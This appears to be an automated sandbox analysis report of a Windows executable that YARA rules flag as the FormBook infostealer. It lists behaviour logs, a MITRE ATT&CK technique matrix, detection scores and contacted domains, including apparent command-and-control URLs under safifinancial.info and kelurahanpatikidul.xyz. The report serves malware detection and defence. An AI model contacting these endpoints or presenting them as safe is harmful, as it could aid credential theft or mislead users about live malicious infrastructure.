Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Scheduled Task/Job1	Process Injection612	Disable or Modify Tools11	Credential API Hooking1	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Deobfuscate/Decode Files or Information1	Input Capture1	System Information Discovery112	Remote Desktop Protocol	Credential API Hooking1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing3	NTDS	Security Software Discovery231	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rootkit1	Cached Domain Credentials	Virtualization/Sandbox Evasion41	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion41	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection612	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Ms5nQdSz5l.exe	26%	Virustotal		Browse
Ms5nQdSz5l.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
9.2.Ms5nQdSz5l.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://crl.microszt	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.safifinancial.info/op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX	0%	Avira URL Cloud	safe
http://crl.microsoft.	0%	URL Reputation	safe
http://crl.microsoft.	0%	URL Reputation	safe
http://crl.microsoft.	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
www.kelurahanpatikidul.xyz/op9s/	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
safifinancial.info	34.102.136.180	true	false	unknown
www.safifinancial.info	unknown	unknown	true	unknown
www.4980057280880200.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.safifinancial.info/op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX	false	Avira URL Cloud: safe	unknown
www.kelurahanpatikidul.xyz/op9s/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers?	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
https://go.micro	powershell.exe, 00000001.00000003.361866562.00000000052D1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.microszt	powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.microsoft.	powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
